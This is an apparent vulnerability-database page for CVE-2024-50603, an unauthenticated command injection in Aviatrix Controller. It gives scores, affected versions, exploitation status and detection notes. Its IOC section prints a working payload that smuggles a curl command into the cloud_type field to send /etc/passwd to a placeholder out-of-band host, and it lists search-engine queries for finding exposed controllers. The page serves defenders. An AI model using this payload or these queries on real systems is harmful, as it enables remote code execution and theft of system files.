cbcvebase.
CVE-2024-50603
published 2025-01-08

CVE-2024-50603: An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS…

PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-02-06
Exploited in the wild
EPSS
98.55%
99.9th percentile
An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.

Affected

3 ranges
VendorProductVersion rangeFixed in
aviatrixcontroller< 7.1.41917.1.4191
aviatrixcontroller>= 7.2 < 7.2.49967.2.4996
aviatrixcontroller>= 7.2.0 < 7.2.49967.2.4996

Detection & IOCsextracted from sources · hover to see the quote

url/v1/api
commandaction=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+{{oast}})
  • Exploit targets POST /v1/api with action=list_flightpath_destination_instances or flightpath_connection_test; inject shell metacharacters in cloud_type or src_cloud_type parameters to achieve unauthenticated RCE
  • Hunt for Aviatrix Controller instances via Shodan/FOFA/ZoomEye using title-based fingerprints: http.title:"aviatrix controller", http.title:"aviatrix cloud controller", app="aviatrix-controller", title="aviatrix cloud controller"
  • Detect exploitation via OAST/interactsh callback: look for HTTP POST to /v1/api returning HTTP 200 combined with out-of-band DNS/HTTP interaction containing root:.*:0:0: in the request body (exfiltrated /etc/passwd)
  • All observed malware was first deployed between 2025-01-07 and 2025-01-10; exploitation surged following publication of a Nuclei template — use this timeline to scope forensic investigation on Aviatrix Controller instances
  • ·The IP address 172.104.60[.]176 is associated with at least one Sliver-deploying actor but is likely a shared proxy server and therefore not strictly reliable as a standalone IOC
  • ·The patch must be re-applied if the Controller is later upgraded to a version prior to 7.1.4191 or 7.2.4996, or if the Controller does not have an associated CoPilot running version 4.16.1 or higher

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.